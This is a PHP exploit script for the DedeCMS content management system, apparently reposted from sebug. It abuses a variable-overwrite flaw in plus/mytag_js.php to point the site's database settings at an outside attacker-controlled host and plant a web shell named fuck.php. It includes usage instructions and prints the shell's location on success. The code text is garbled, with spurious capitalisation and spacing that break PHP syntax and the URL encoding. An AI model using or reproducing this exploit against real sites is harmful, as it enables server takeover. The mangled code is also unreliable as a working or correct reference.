#! Usr/bin/php-w
<? Php
Error_reporting (E_ERROR );
Set_time_limit (0 );
Print_r ('
DEDEcms Variable Coverage
Exploit Author: [url] www.heixiaozi.com [/url] [url] www.webvul.com [/url]
);
Echo "\ r \ n ";
If ($ argv [2] = null ){
Print_r ('
+ --------------------------------------------------------------------------- +
Usage: php '. $ argv [0].' url aid path
Aid = 1 shellpath/data/cache aid = 2 shellpath =/aid = 3 shellpath =/plus/
Example:
Php '. $ argv [0].' [url] www.site.com [/url] 1 old
+ --------------------------------------------------------------------------- +
');
Exit;
}
$ Url = $ argv [1];
$ Aid = $ argv [2];
$ Path = $ argv [3];
$ Exp = Getshell ($ url, $ aid, $ path );
If (strpos ($ exp, "OK")> 12 ){
Echo "[*] Exploit Success \ n ";
If ($ aid = 1) echo "[*] Shell:". $ url. "/$ path/data/cache/fuck. php \ n ";
If ($ aid = 2) echo "[*] Shell:". $ url. "/$ path/fuck. php \ n ";
If ($ aid = 3) echo "[*] Shell:". $ url. "/$ path/plus/fuck. php \ n ";
} Else {
Echo "[*] Exploit Failed \ n ";
}
Function Getshell ($ url, $ aid, $ path ){
$ Id = $ aid;
$ Host = $ url;
$ Port = "80 ";
$ Content = "doaction = http % 3A % 2F % 2F $ host % 2 Fplus % 2Fmytag_js.php % 3 Faid % 3D1 & _ COOKIE % 5 BGLOBALS % 5D % 5Bcfg_dbhost % 5D = 184.105.174.114 & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbuser % 5D = exploit & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbpwd % 5D = 90sec & _ COOKIE % 5 BGLOBALS % 5D % 5b%_dbname % 5D = exploit & _ COOKIE % 5 BGLOBALS % 5D % 5b1__dbprefix % 5D = dede _ & nocache = true & QuickSearchBtn = % CC % E1 % BD % BB ";
$ Data = "POST/$ path/plus/mytag_js.php? Aid = ". $ id." HTTP/1.1 \ r \ n ";
$ Data. = "Host:". $ host. "\ r \ n ";
$ Data. = "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1 \ r \ n ";
$ Data. = "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n ";
$ Data. = "Accept-Language: zh-cn, zh; q = 0.5 \ r \ n ";
// $ Data. = "Accept-Encoding: gzip, deflate \ r \ n ";
$ Data. = "Accept-Charset: GB2312, UTF-8; q = 0.7, *; q = 0.7 \ r \ n ";
$ Data. = "Connection: keep-alive \ r \ n ";
$ Data. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Data. = "Content-Length:". strlen ($ content). "\ r \ n ";
$ Data. = $ content. "\ r \ n ";
$ Ock = fsockopen ($ host, $ port );
If (! $ Ock ){
Echo "[*] No response from". $ host. "\ n ";
}
Fwrite ($ ock, $ data );
While (! Feof ($ ock )){
$ Exp = fgets ($ ock, 1024 );
Return $ exp;
}
}
?>
From: sebug